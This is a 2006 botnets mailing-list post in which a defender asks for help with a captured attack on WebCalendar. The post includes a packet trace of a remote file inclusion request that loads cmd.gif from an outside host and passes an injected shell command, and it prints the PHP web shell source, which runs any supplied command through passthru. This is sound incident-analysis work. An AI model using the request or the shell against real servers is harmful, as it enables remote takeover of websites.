[botnets] can't figure this one out

brack Mon, 20 Mar 2006 16:25:48 -0800

To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
----------
I found a web calendar overflow that pulled this URL:


http://www.datatrade.com/downloads/.../cmd.gif

Here is the full trace:
23:37:49.503772 IP 64.34.197.189.49278 > 192.168.10.10.80: P 
3981950149:3981950460(311) ack 205900033 win 5840 <nop,nop,timestamp 
4530592 0>
        0x0000:  4510 016b 9d5b 4000 3706 d48f 4022 c5bd  [EMAIL PROTECTED]@"..
        0x0010:  c0a8 0a0a c07e 0050 ed57 bcc5 0c45 c901  .....~.P.W...E..
        0x0020:  8018 16d0 5fcf 0000 0101 080a 0045 21a0  ...._........E!.
        0x0030:  0000 0000 4745 5420 2f2f 6361 6c65 6e64  ....GET.//calend
        0x0040:  6172 2f74 6f6f 6c73 2f73 656e 645f 7265  ar/tools/send_re
        0x0050:  6d69 6e64 6572 732e 7068 703f 696e 636c  minders.php?incl
        0x0060:  7564 6564 6972 3d68 7474 703a 2f2f 7777  udedir=http://ww
        0x0070:  772e 6461 7461 7472 6164 652e 636f 6d2f  w.datatrade.com/
        0x0080:  646f 776e 6c6f 6164 732f 2e2e 2e2f 636d  downloads/.../cm
        0x0090:  642e 6769 663f 2663 6d64 3d65 6368 6f3b  d.gif?&cmd=echo;
        0x00a0:  7768 6963 6825 3230 773b 6563 686f 2048  which%20w;echo.H
        0x00b0:  5454 502f 312e 310d 0a41 6363 6570 743a  TTP/1.1..Accept:
        0x00c0:  202a 2f2a 0d0a 4163 6365 7074 2d4c 616e  .*/*..Accept-Lan
        0x00d0:  6775 6167 653a 2065 6e2d 7573 0d0a 4163  guage:.en-us..Ac
        0x00e0:  6365 7074 2d45 6e63 6f64 696e 673a 2067  cept-Encoding:.g
        0x00f0:  7a69 702c 2064 6566 6c61 7465 0d0a 5573  zip,.deflate..Us
        0x0100:  6572 2d41 6765 6e74 3a20 4d6f 7a69 6c6c  er-Agent:.Mozill
        0x0110:  612f 342e 3020 2863 6f6d 7061 7469 626c  a/4.0.(compatibl
        0x0120:  653b 204d 5349 4520 362e 303b 2057 696e  e;.MSIE.6.0;.Win
        0x0150:  2e6f 7267 0d0a 436f 6e6e 6563 7469 6f6e  .org..Connection
        0x0160:  3a20 436c 6f73 650d 0a0d 0a              :.Close....

When I look at the download file (cmd.gif) it doesn't seem to be complete:

<?
  if (isset($chdir)) @chdir($chdir);
  ob_start();
  passthru("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
  $output = ob_get_contents();
  ob_end_clean();
  if (!empty($output)) echo str_replace(">", "&gt;",   
str_replace("<","&lt;", $output));

?>


So I am figuring this to be an attack directly against webcalendar and 
not a php injection to build up a botnet.   Any input from the crew?

tc













-------------------------------------------------
Email solutions, MS Exchange alternatives and extrication,
security services, systems integration.
Contact:    [EMAIL PROTECTED]


_______________________________________________
To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
All list and server information are public and available to law enforcement 
upon request.
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets

[botnets] can't figure this one out

Reply via email to